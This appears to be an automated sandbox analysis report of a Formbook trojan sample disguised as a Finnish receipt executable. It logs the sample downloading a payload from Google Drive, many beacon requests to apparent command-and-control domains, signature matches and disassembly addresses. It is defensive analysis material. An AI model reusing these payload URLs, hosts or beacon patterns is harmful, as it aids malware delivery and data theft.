      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/k5vv2eer5piasl85vm2gu1ubr744dkes/1685437575000/04063919605701821530/*/1gvJNG_hcxbVMWQvESL5VmHgfKw3TSb3S?e=download&uuid=0165319d-d6ed-4364-9b74-a19685a5f726 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: doc-04-7k-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.1win-legal1.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.minskadue.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.marketing-solution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.tsygy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.cookcollectives.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.printmyride.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.fairbitawayposearisk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.dkansai-cp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.comoparardefumar.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.albaymedya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=BJuKMup2GV76y7PN1TAAeEW5uAzDipAxIHnNePHx/XVxjn7DTtYSqvDx4g/JiwsgTds8bJvsGAi/M/AJ9Pl0F9zoyJQ+vWMQHA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.roconsultores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=zvsOmuV0RkpNj9dmmLvcNYSUCKV3obfROWhQI5uFrAaJab0t5Tdz/8Us64BcH9fOYlnSp9W3WhuAhk0hcdTywJHY62KLeFNtHg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.aurizhon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=k2D3DblF7vL6SN+gu0l7QPzZCDmxseSx80MfaI1OtzxPgAvg61Sn0PlLCTFPQNSP+C41MomAw+jmeQI9bGxtvb+gFV+DCXaP5w==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.solarwachstum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=U7ETdamdP1ZCKOUjEiyRlibAgxYlwKZeBR7oaxwm2PdxgC4EyvOHYU8IW8pd/NQOhWFEBZrGHEgN3MxkyARqzohq8TIPp6MjlQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.ep09.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=mDEdoIjvGdDKka9ru4QwK/GisJWxY9EIyNGATwE/O1GDb08I/XgAMo6lLUTyBtJ+E+b+Hhq9pNT1+wqS6RrKc+0XnVP7aUjPVQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.zinkiggekis.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.scottsteedley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.1win-legal1.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.minskadue.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.marketing-solution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.tsygy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.cookcollectives.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.printmyride.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.fairbitawayposearisk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.dkansai-cp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.comoparardefumar.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.albaymedya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?2ax=jRqfPy4_lz2&O0qEM=t2tzMhBRWo10Eosyb8KFBuaI1V5h8MV7T2bC3+E0nZXV+FHXmJExWsZaqAHQ5axaFjoD9IuPadSp7WKT8CRkiPajdeOXH8cJLw== HTTP/1.1Host: www.oleictude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&2ax=jRqfPy4_lz2 HTTP/1.1Host: www.scottsteedley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?2ax=jRqfPy4_lz2&O0qEM=IiqkKM0fZYbcVAhAnum4m1H4t/7jN9R9rdXOIOC6/CZopBQ7QWkcbeNISYKTY0qHDgk4y1fleDCOJFlZ6etMDJwjph9a+HDsvg== HTTP/1.1Host: www.arrangeabreak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.11.20:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49760 version: TLS 1.2
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405553

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Siirtokuitti_006703.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8968 -s 120
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00404D901_2_00404D90
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00406ABA1_2_00406ABA
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322B271_2_03322B27
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321F291_2_03321F29
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332272F1_2_0332272F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332172C1_2_0332172C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320F181_2_03320F18
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332277C1_2_0332277C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033213601_2_03321360
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320F531_2_03320F53
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322B9E1_2_03322B9E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321F891_2_03321F89
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033227F71_2_033227F7
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033213E41_2_033213E4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322BEA1_2_03322BEA
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320FD51_2_03320FD5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321FD91_2_03321FD9
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320BDF1_2_03320BDF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332222D1_2_0332222D
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033216731_2_03321673
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332267F1_2_0332267F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320E601_2_03320E60
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332126C1_2_0332126C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321A581_2_03321A58
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321E5C1_2_03321E5C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322AB81_2_03322AB8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322A9F1_2_03322A9F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033226F41_2_033226F4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033212E51_2_033212E5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033216D01_2_033216D0
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321ECF1_2_03321ECF
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033225361_2_03322536
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332151E1_2_0332151E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332191E1_2_0332191E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322D0F1_2_03322D0F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332110C1_2_0332110C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321D721_2_03321D72
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033221A91_2_033221A9
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033225971_2_03322597
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033219941_2_03321994
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033215981_2_03321598
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332118F1_2_0332118F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320D8F1_2_03320D8F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033211FC1_2_033211FC
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033225FC1_2_033225FC
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320DE51_2_03320DE5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033215E81_2_033215E8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321DEE1_2_03321DEE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033219D41_2_033219D4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033210311_2_03321031
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033214391_2_03321439
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228761_2_03322876
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228741_2_03322874
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332287A1_2_0332287A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228781_2_03322878
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332287E1_2_0332287E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332287C1_2_0332287C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332286E1_2_0332286E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332245F1_2_0332245F
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033220431_2_03322043
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03320C451_2_03320C45
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321C4C1_2_03321C4C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322C4C1_2_03322C4C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228BB1_2_033228BB
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228BE1_2_033228BE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03322CA11_2_03322CA1
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228921_2_03322892
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228901_2_03322890
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228961_2_03322896
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228981_2_03322898
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033214991_2_03321499
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033218991_2_03321899
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228821_2_03322882
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228801_2_03322880
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228861_2_03322886
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228841_2_03322884
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332288A1_2_0332288A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228881_2_03322888
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332288E1_2_0332288E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332288C1_2_0332288C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332108D1_2_0332108D
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033220F71_2_033220F7
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03321CC41_2_03321CC4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033228C81_2_033228C8
